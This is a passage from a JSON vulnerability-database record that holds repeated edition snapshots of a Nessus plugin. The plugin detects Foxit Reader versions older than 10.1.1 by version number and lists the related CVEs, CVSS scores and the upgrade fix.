"AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144567", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13547", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13570", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27860", "http://www.nessus.org/u?a27a3e57", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13560", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13548", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28203"], "cvelist": ["CVE-2020-13547", "CVE-2020-13548", "CVE-2020-13557", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-27860", "CVE-2020-28203"], "immutableFields": [], "lastseen": "2021-08-05T12:54:21", "history": [], "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["FOXIT_PHANTOM_10_1_1.NASL", "FOXIT_PHANTOM_9_7_5.NASL"]}, {"type": "kaspersky", "idList": ["KLA12028"]}, {"type": "cve", "idList": ["CVE-2020-28203", "CVE-2020-13547", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13557", "CVE-2020-13560"]}, {"type": "zdi", "idList": ["ZDI-20-1415"]}, {"type": "talos", "idList": ["TALOS-2020-1175", "TALOS-2020-1181", "TALOS-2020-1165", "TALOS-2020-1171", "TALOS-2020-1166"]}], "modified": "2021-08-05T12:54:21", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-08-05T12:54:21", "rev": 2}}, "objectVersion": "1.6", "pluginID": "144567", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144567);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit Reader < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF viewer installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is,\ntherefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit Reader version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:foxit_reader\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_reader_installed.nasl\");\n script_require_keys(\"installed_sw/Foxit Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'Foxit Reader';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": [], "solution": "Upgrade to Foxit Reader version 10.1.1 or later", "nessusSeverity": "", "cvssScoreSource": "CVE-2020-27860", "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2020-12-09T00:00:00", "vulnerabilityPublicationDate": "2020-12-09T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-05T12:54:21", "differentElements": ["cpe"], "edition": 7}, {"bulletin": {"id": "FOXIT_READER_10_1_1.NASL", "hash": "d23b05eeda105a76d2e04ed736625d6d", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit Reader < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2021-06-03T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144567", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13570", "http://www.nessus.org/u?a27a3e57", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13548", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28203", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13547", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27860", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13560"], "cvelist": ["CVE-2020-13547", "CVE-2020-13548", "CVE-2020-13557", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-27860", "CVE-2020-28203"], "immutableFields": [], "lastseen": "2021-08-06T13:28:51", "history": [], "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "kaspersky", "idList": ["KLA12028"]}, {"type": "nessus", "idList": ["FOXIT_PHANTOM_10_1_1.NASL", "FOXIT_PHANTOM_9_7_5.NASL"]}, {"type": "cve", "idList": ["CVE-2020-13557", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13570", "CVE-2020-27860", "CVE-2020-13560", "CVE-2020-28203"]}, {"type": "zdi", "idList": ["ZDI-20-1415"]}, {"type": "talos", "idList": ["TALOS-2020-1171", "TALOS-2020-1175", "TALOS-2020-1181", "TALOS-2020-1166", "TALOS-2020-1165"]}], "modified": "2021-08-06T13:28:51", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-08-06T13:28:51", "rev": 2}}, "objectVersion": "1.6", "pluginID": "144567", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144567);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit Reader < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF viewer installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is,\ntherefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit Reader version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:foxit_reader\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_reader_installed.nasl\");\n script_require_keys(\"installed_sw/Foxit Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'Foxit Reader';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:foxit_reader"], "solution": "Upgrade to Foxit Reader version 10.1.1 or later", "nessusSeverity": "", "cvssScoreSource": "CVE-2020-27860", "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2020-12-09T00:00:00", "vulnerabilityPublicationDate": "2020-12-09T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-06T13:28:51", "differentElements": ["nessusSeverity"], "edition": 8}, {"bulletin": {"id": "FOXIT_READER_10_1_1.NASL", "hash": "9dc382b008e244e73ef9fdc2414cc01e", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit Reader < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2021-06-03T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144567", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27860", "http://www.nessus.org/u?a27a3e57", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13547", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13548", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13560", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28203", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13570"], "cvelist": ["CVE-2020-13547", "CVE-2020-13548", "CVE-2020-13557", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-27860", "CVE-2020-28203"], "immutableFields": [], "lastseen": "2021-08-19T12:08:26", "history": [], "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "kaspersky", "idList": ["KLA12028"]}, {"type": "nessus", "idList": ["FOXIT_PHANTOM_9_7_5.NASL", "FOXIT_PHANTOM_10_1_1.NASL"]}, {"type": "cve", "idList": ["CVE-2020-13560", "CVE-2020-13570", "CVE-2020-13557", "CVE-2020-13548", "CVE-2020-28203", "CVE-2020-13547", "CVE-2020-27860"]}, {"type": "zdi", "idList": ["ZDI-20-1415"]}, {"type": "talos", "idList": ["TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1165", "TALOS-2020-1171", "TALOS-2020-1166"]}], "modified": "2021-08-19T12:08:26", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-08-19T12:08:26", "rev": 2}}, "objectVersion": "1.6", "pluginID": "144567", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144567);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit Reader < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF viewer installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is,\ntherefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit Reader version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:foxit_reader\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_reader_installed.nasl\");\n script_require_keys(\"installed_sw/Foxit Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'Foxit Reader';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:foxit_reader"], "solution": "Upgrade to Foxit Reader version 10.1.1 or later", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2020-27860", "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2020-12-09T00:00:00", "vulnerabilityPublicationDate": "2020-12-09T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-19T12:08:26", "differentElements": ["vpr"], "edition": 9}, {"bulletin": {"id": "FOXIT_READER_10_1_1.NASL", "hash": "9805631673b9b8b3e890730b7f9a8b40", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit Reader < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2021-06-03T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144567", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13560", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13570", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13548", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28203", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13547", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27860", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557", "http://www.nessus.org/u?a27a3e57"], "cvelist": ["CVE-2020-13547", "CVE-2020-13548", "CVE-2020-13557", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-27860", "CVE-2020-28203"], "immutableFields": [], "lastseen": "2021-09-24T11:54:48", "history": [], "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "kaspersky", "idList": ["KLA12028"]}, {"type": "nessus", "idList": ["FOXIT_PHANTOM_9_7_5.NASL", "FOXIT_PHANTOM_10_1_1.NASL"]}, {"type": "cve", "idList": ["CVE-2020-28203", "CVE-2020-13557", "CVE-2020-13548", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-13547", "CVE-2020-27860"]}, {"type": "zdi", "idList": ["ZDI-20-1415"]}, {"type": "talos", "idList": ["TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1171", "TALOS-2020-1165", "TALOS-2020-1166"]}], "modified": "2021-09-24T11:54:48", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-24T11:54:48", "rev": 2}}, "objectVersion": "1.6", "pluginID": "144567", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144567);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit Reader < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF viewer installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is,\ntherefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit Reader version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:foxit_reader\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_reader_installed.nasl\");\n script_require_keys(\"installed_sw/Foxit Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'Foxit Reader';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:foxit_reader"], "solution": "Upgrade to Foxit Reader version 10.1.1 or later", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2020-27860", "vpr": {"risk factor": "Medium", "score": "5.9"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2020-12-09T00:00:00", "vulnerabilityPublicationDate": "2020-12-09T00:00:00", "exploitableWith": []}, "lastseen": "2021-09-24T11:54:48", "differentElements": ["vpr"], "edition": 10}, {"bulletin": {"id": "FOXIT_READER_10_1_1.NASL", "hash": "9dc382b008e244e73ef9fdc2414cc01e", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit Reader < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2021-06-03T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144567", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28203", "http://www.nessus.org/u?a27a3e57", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27860", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13548", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13547", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13570", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13560"], "cvelist": ["CVE-2020-13547", "CVE-2020-13548", "CVE-2020-13557", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-27860", "CVE-2020-28203"], "immutableFields": [], "lastseen": "2021-10-18T11:44:24", "history": [], "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "kaspersky", "idList": ["KLA12028"]}, {"type": "nessus", "idList": ["FOXIT_PHANTOM_9_7_5.NASL", "FOXIT_PHANTOM_10_1_1.NASL"]}, {"type": "cve", "idList": ["CVE-2020-13557", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-28203", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13570"]}, {"type": "zdi", "idList": ["ZDI-20-1415"]}, {"type": "talos", "idList": ["TALOS-2020-1165", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1166", "TALOS-2020-1171"]}], "modified": "2021-10-18T11:44:24", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-18T11:44:24", "rev": 2}}, "objectVersion": "1.6", "pluginID": "144567", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144567);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit Reader < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF viewer installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is,\ntherefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit Reader version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:foxit_reader\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_reader_installed.nasl\");\n script_require_keys(\"installed_sw/Foxit Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'Foxit Reader';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:foxit_reader"], "solution": "Upgrade to Foxit Reader version 10.1.1 or later", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2020-27860", "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2020-12-09T00:00:00", "vulnerabilityPublicationDate": "2020-12-09T00:00:00", "exploitableWith": []}, "lastseen": "2021-10-18T11:44:24", "differentElements": ["vpr"], "edition": 11}], "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "kaspersky", "idList": ["KLA12028"]}, {"type": "nessus", "idList": ["FOXIT_PHANTOM_9_7_5.NASL", "FOXIT_PHANTOM_10_1_1.NASL"]}, {"type": "cve", "idList": ["CVE-2020-13557", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-28203", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13570"]}, {"type": "zdi", "idList": ["ZDI-20-1415"]}, {"type": "talos", "idList": ["TALOS-2020-1165", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1166", "TALOS-2020-1171"]}], 